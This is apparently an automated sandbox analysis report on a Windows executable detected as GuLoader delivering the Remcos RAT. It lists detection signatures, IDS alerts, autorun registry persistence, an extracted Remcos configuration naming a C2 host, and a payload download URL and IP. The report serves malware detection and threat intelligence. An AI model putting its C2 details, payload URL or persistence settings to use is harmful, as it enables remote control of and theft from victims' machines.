Edit tour

Windows Analysis Report
IpykYx5iwz.exe

Overview

General Information

Sample name:	IpykYx5iwz.exe renamed because original name is a hash value
Original sample name:	5aeb1293c473a66795bf0ff3a7892e6a6cf70aea5248a38f204632a5fdbe1f63.exe
Analysis ID:	1588020
MD5:	15214c528c41de4d5e542ebd3d4ac075
SHA1:	bdab48d323ab0e0c4689061db5fb08adfe1afec8
SHA256:	5aeb1293c473a66795bf0ff3a7892e6a6cf70aea5248a38f204632a5fdbe1f63
Tags:	exeGuLoadersigneduser-adrian__luca
Infos:

Detection

Remcos, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Detected Remcos RAT

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Remcos

Suricata IDS alerts for network traffic

Yara detected GuLoader

Yara detected Remcos RAT

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Creates autostart registry keys with suspicious values (likely registry only malware)

Drops PE files with a suspicious file extension

Sigma detected: New RUN Key Pointing to Suspicious Folder

Switches to a custom stack to bypass stack traces

Tries to detect virtualization through RDTSC time measurements

Contains functionality for read data from the clipboard

Contains functionality to shutdown / reboot the system

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: SCR File Write Event

Sigma detected: Suspicious Screensaver Binary File Creation

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Classification

Process Tree

System is w10x64

IpykYx5iwz.exe (PID: 3608 cmdline: "C:\Users\user\Desktop\IpykYx5iwz.exe" MD5: 15214C528C41DE4D5E542EBD3D4AC075)

IpykYx5iwz.exe (PID: 180 cmdline: "C:\Users\user\Desktop\IpykYx5iwz.exe" MD5: 15214C528C41DE4D5E542EBD3D4AC075)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Remcos, RemcosRAT	Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.	APT33 The Gorgon Group UAC-0050	http://malware-traffic-analysis.net/2017/12/22/index.html https://0xmrmagnezi.github.io/malware%20analysis/RemcosRAT/ https://asec.ahnlab.com/en/32376/ https://asec.ahnlab.com/ko/25837/ https://asec.ahnlab.com/ko/32101/	https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["subddfg.lol:2404:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-A65UIX", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000001.00000002.4140572954.0000000005C5C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000001.00000002.4140363703.0000000005C28000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000000.00000002.1784802321.0000000005E8C000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: IpykYx5iwz.exe PID: 180	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security

Sigma Signatures

System Summary

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\subfolder1\Reaccented.scr, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\IpykYx5iwz.exe, ProcessId: 180, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Startup key

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\subfolder1\Reaccented.scr, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\IpykYx5iwz.exe, ProcessId: 180, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Startup key

Sigma detected: SCR File Write Event

Source: File created

Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\Desktop\IpykYx5iwz.exe, ProcessId: 180, TargetFilename: C:\Users\user\AppData\Local\Temp\subfolder1\Reaccented.scr

Sigma detected: Suspicious Screensaver Binary File Creation

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\IpykYx5iwz.exe, ProcessId: 180, TargetFilename: C:\Users\user\AppData\Local\Temp\subfolder1\Reaccented.scr

Stealing of Sensitive Information

Sigma detected: Remcos

Source: Registry Key set

Author: Joe Security: Data: Details: 48 54 74 EB 28 8C F8 84 30 0F D0 19 A7 A5 AD AB 1D DE E7 E2 6E DE 4A DE C2 3C 18 71 BC 63 AA 5A 1D D0 B1 69 54 87 55 5F CC 75 74 E1 66 45 98 AC 91 80 50 91 3E 39 2F C9 88 A8 7D 83 3B 33 9F 9B 8C 8A 12 42 D1 9C E1 83 11 30 34 76 , EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\IpykYx5iwz.exe, ProcessId: 180, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-A65UIX\exepath

Suricata Signatures

ET JA3 Hash - Remcos 3.x/4.x TLS Connection

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T20:39:14.698396+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.4	49737	94.156.177.164	2404	TCP
2025-01-10T20:39:37.086202+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.4	49738	94.156.177.164	2404	TCP
2025-01-10T20:39:59.513567+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.4	49826	94.156.177.164	2404	TCP
2025-01-10T20:40:21.908012+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.4	49955	94.156.177.164	2404	TCP
2025-01-10T20:40:44.295391+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.4	50009	94.156.177.164	2404	TCP
2025-01-10T20:41:06.685480+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.4	50010	94.156.177.164	2404	TCP
2025-01-10T20:41:29.092444+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.4	50011	94.156.177.164	2404	TCP
2025-01-10T20:41:51.468057+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.4	50012	94.156.177.164	2404	TCP
2025-01-10T20:42:13.857616+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.4	50013	94.156.177.164	2404	TCP
2025-01-10T20:42:36.234204+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.4	50014	94.156.177.164	2404	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T20:38:48.834449+0100	2803270	2	Potentially Bad Traffic	192.168.2.4	49736	164.160.91.32	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: subddfg.lol

Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000001.00000002.4140363703.0000000005C28000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: Remcos {"Host:Port:Password": ["subddfg.lol:2404:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-A65UIX", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\subfolder1\Reaccented.scr

ReversingLabs: Detection: 50%

Multi AV Scanner detection for submitted file

Source: IpykYx5iwz.exe	Virustotal: Detection: 66%			Perma Link
Source: IpykYx5iwz.exe	ReversingLabs: Detection: 50%

Yara detected Remcos RAT

Source: Yara match	File source: 00000001.00000002.4140572954.0000000005C5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.4140363703.0000000005C28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: IpykYx5iwz.exe PID: 180, type: MEMORYSTR

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Source: IpykYx5iwz.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 164.160.91.32:443 -> 192.168.2.4:49736 version: TLS 1.2

Source: IpykYx5iwz.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Code function: 0_2_00406444 FindFirstFileA,FindClose,	0_2_00406444
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Code function: 0_2_00405909 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_00405909
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Code function: 0_2_00402765 FindFirstFileA,	0_2_00402765
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Code function: 1_2_00406444 FindFirstFileA,FindClose,	1_2_00406444
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Code function: 1_2_00402765 FindFirstFileA,	1_2_00402765
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Code function: 1_2_00405909 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	1_2_00405909

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49737 -> 94.156.177.164:2404
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49738 -> 94.156.177.164:2404
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49826 -> 94.156.177.164:2404
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50012 -> 94.156.177.164:2404
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50011 -> 94.156.177.164:2404
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49955 -> 94.156.177.164:2404
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50009 -> 94.156.177.164:2404
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50010 -> 94.156.177.164:2404
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50013 -> 94.156.177.164:2404
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50014 -> 94.156.177.164:2404

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: subddfg.lol

Source: global traffic

TCP traffic: 192.168.2.4:49737 -> 94.156.177.164:2404

Source: Joe Sandbox View

ASN Name: NET1-ASBG NET1-ASBG

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic

Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49736 -> 164.160.91.32:443

Source: global traffic

HTTP traffic detected: GET /gmjzqcQFfx21.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: www.healthselflesssupplies.co.zaCache-Control: no-cache

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

Source: global traffic	DNS traffic detected: DNS query: www.healthselflesssupplies.co.za
Source: global traffic	DNS traffic detected: DNS query: subddfg.lol

Source: IpykYx5iwz.exe, Reaccented.scr.1.dr	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: IpykYx5iwz.exe, Reaccented.scr.1.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: IpykYx5iwz.exe, 00000001.00000002.4140363703.0000000005C28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.healthselflesssupplies.co.za/
Source: IpykYx5iwz.exe, 00000001.00000002.4140363703.0000000005BE8000.00000004.00000020.00020000.00000000.sdmp, IpykYx5iwz.exe, 00000001.00000002.4141067089.0000000007690000.00000004.00001000.00020000.00000000.sdmp, IpykYx5iwz.exe, 00000001.00000002.4140363703.0000000005C28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.healthselflesssupplies.co.za/gmjzqcQFfx21.bin
Source: IpykYx5iwz.exe, 00000001.00000002.4140363703.0000000005C28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.healthselflesssupplies.co.za/gmjzqcQFfx21.bin8
Source: IpykYx5iwz.exe, 00000001.00000002.4140363703.0000000005BE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.healthselflesssupplies.co.za/gmjzqcQFfx21.bin8m
Source: IpykYx5iwz.exe, 00000001.00000002.4140363703.0000000005BE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.healthselflesssupplies.co.za/gmjzqcQFfx21.binL
Source: IpykYx5iwz.exe, 00000001.00000002.4140363703.0000000005C28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.healthselflesssupplies.co.za/q

Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736

Source: unknown

HTTPS traffic detected: 164.160.91.32:443 -> 192.168.2.4:49736 version: TLS 1.2

Source: C:\Users\user\Desktop\IpykYx5iwz.exe

Code function: 0_2_004053A6 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004053A6

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: 00000001.00000002.4140572954.0000000005C5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.4140363703.0000000005C28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: IpykYx5iwz.exe PID: 180, type: MEMORYSTR

Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Code function: 0_2_00403384 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		0_2_00403384
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Code function: 1_2_00403384 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		1_2_00403384

Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Code function: 0_2_004067CD		0_2_004067CD
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Code function: 1_2_004067CD		1_2_004067CD

Source: C:\Users\user\Desktop\IpykYx5iwz.exe

Code function: String function: 00402B2C appears 48 times

Source: IpykYx5iwz.exe

Static PE information: invalid certificate

Source: IpykYx5iwz.exe, 00000000.00000000.1676427987.0000000000437000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamecapillitia.exe4 vs IpykYx5iwz.exe
Source: IpykYx5iwz.exe, 00000001.00000000.1781605887.0000000000437000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamecapillitia.exe4 vs IpykYx5iwz.exe
Source: IpykYx5iwz.exe	Binary or memory string: OriginalFilenamecapillitia.exe4 vs IpykYx5iwz.exe

Source: IpykYx5iwz.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: IpykYx5iwz.exe, Reaccented.scr.1.dr

Binary or memory string: 2.VbP

Source: classification engine

Classification label: mal100.troj.evad.winEXE@3/18@2/2

Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Code function: 0_2_00403384 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		0_2_00403384
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Code function: 1_2_00403384 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		1_2_00403384

Source: C:\Users\user\Desktop\IpykYx5iwz.exe

Code function: 0_2_00404661 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

0_2_00404661

Source: C:\Users\user\Desktop\IpykYx5iwz.exe

Code function: 0_2_00402138 CoCreateInstance,MultiByteToWideChar,

0_2_00402138

Source: C:\Users\user\Desktop\IpykYx5iwz.exe

File created: C:\Users\user\Music\Udstyrelserne.ini

Jump to behavior

Source: C:\Users\user\Desktop\IpykYx5iwz.exe

Mutant created: \Sessions\1\BaseNamedObjects\Rmc-A65UIX

Source: C:\Users\user\Desktop\IpykYx5iwz.exe

File created: C:\Users\user\AppData\Local\Temp\nsk70B0.tmp

Jump to behavior

Source: IpykYx5iwz.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\IpykYx5iwz.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\IpykYx5iwz.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: IpykYx5iwz.exe	Virustotal: Detection: 66%
Source: IpykYx5iwz.exe	ReversingLabs: Detection: 50%

Source: C:\Users\user\Desktop\IpykYx5iwz.exe

File read: C:\Users\user\Desktop\IpykYx5iwz.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\IpykYx5iwz.exe "C:\Users\user\Desktop\IpykYx5iwz.exe"
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Process created: C:\Users\user\Desktop\IpykYx5iwz.exe "C:\Users\user\Desktop\IpykYx5iwz.exe"
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Process created: C:\Users\user\Desktop\IpykYx5iwz.exe "C:\Users\user\Desktop\IpykYx5iwz.exe"	Jump to behavior

Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Section loaded: ncryptsslp.dll	Jump to behavior
